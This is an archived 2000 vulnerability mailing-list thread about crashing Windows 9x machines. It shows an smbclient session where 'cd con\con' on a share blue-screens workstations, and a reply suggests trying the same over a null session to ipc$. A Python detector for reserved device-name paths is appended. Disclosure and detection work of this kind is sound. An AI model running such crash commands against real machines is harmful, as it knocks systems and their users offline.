Vulnerability Development mailing list archives

Re: Crashing Win9x with smbclient


From: marc () EEYE COM (Marc)
Date: Tue, 14 Mar 2000 09:22:21 -0800


From what I've seen, the bluescreen con/con stuff is only happening if you
are able to connect to a share. So if you don't have access to a share you
can't make it bluescreen. So maybe it would be worth it to try con/con
related things against stuff like ipc$, so you don't even need access to a
share but just to do a null session connection. Just a thought.

Signed,
Marc
eEye Digital Security
http://www.eEye.com

"It is the years that blind you. Searching so hard for success you lose
grasp on the basic wonders of being alive."
-chameleon

| -----Original Message-----
| From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM] On Behalf Of Bud Meister
| Sent: Monday, March 13, 2000 2:52 PM
| To: VULN-DEV () SECURITYFOCUS COM
| Subject: Crashing Win9x with smbclient
|
|
| Hi everyone,
|
| I'm an assistant in a high school computer lab with about
| 25 Win9x workstations and a Linux server. All the stations
| have a shared "My Documents" directory, so students can
| save their work locally and still be able to access it from
| other workstations. The Linux server is really only there
| for my own personal use, not as a student fileserver
| (hence the shares).
|
| After reading the thread about the 'con\con' bug, I decided
| to do a little experimenting. Here's what I found
| (displayed information is skewed):
|
| --------------------
| [neo@neo ~]$ smbclient '\\station-1\my documents'
| Password:
|
| smb:\> ls
|   Sarah1.doc     358739857   48574
|   JoePic.jpg       7634733     873
|
| smb:\> cd con\con
| *disconnect*
|
| [neo@neo ~]$
| --------------------
|
| After I attempted the change directory command, Station-1 bluescreened
| immediately. I repeated this process on 5 other workstations, and all
| bluescreened; some were recoverable (but too unstable to continue without
| a reboot), but most had to be rebooted.
|
| This bug probably won't have any effect on our network, since we're
| running IP masquerading on our router and nothing can come in. The only
| way I've exploited it remotely is by using smbclient on a Windows machine
| (my Linux box is the only one in the school).
|
| As for larger effects, I couldn't say. That's why I mentioned it here :)
| I realize this is somewhat of an old problem, and this technique may
| have already been discovered, but I'm curious to see what others have
| to say on this topic.
|
|
| ----->Buddy
| budmeister1 () juno com
| http://tenbux.iwarp.com/
|
|
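A detection-side view of the request shown in the session above, as an added example that is not part of either message: it flags SMB path requests whose components are DOS reserved device names. The log format, the sample lines and the function names are assumptions made for illustration, and the device-name list generalizes beyond the single `con\con` case the thread shows.

```python
import re

# DOS reserved device names. The page only shows "con\con"; the rest of the
# list is a generalization added for this example.
RESERVED = re.compile(r"^(con|prn|aux|nul|clock\$|com[1-9]|lpt[1-9])$", re.I)

def reserved_components(path):
    """Return the path components that resolve to a DOS device name."""
    hits = []
    for part in re.split(r"[\\/]+", path):
        # An extension or trailing dots/spaces do not stop a name from
        # resolving to the device, so "CON.txt" and "nul ." are matched too.
        stem = part.split(".", 1)[0].rstrip(" ")
        if RESERVED.match(stem):
            hits.append(part)
    return hits

def classify(path):
    """'device-path' for the con\\con shape, 'reserved-name' for one hit."""
    n = len(reserved_components(path))
    return "device-path" if n >= 2 else "reserved-name" if n == 1 else None

def flag_requests(log_lines):
    """Yield (client, server, path, verdict) for requests worth alerting on."""
    for line in log_lines:
        # Assumed format: time client server operation path (path may hold spaces).
        _ts, client, server, _op, path = line.split(" ", 4)
        verdict = classify(path)
        if verdict:
            yield client, server, path, verdict

# Constructed sample log lines, not taken from the thread.
SAMPLE = [
    r"14:40:02 10.0.0.5 station-1 CHDIR \con\con",
    r"14:40:09 10.0.0.7 station-2 OPEN \reports\icon.bmp",
    r"14:41:30 10.0.0.5 station-3 OPEN \My Documents\NUL.txt",
    r"14:42:11 10.0.0.9 station-4 CHDIR /console/lpt1 ./aux",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE):
        print(*hit)
```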

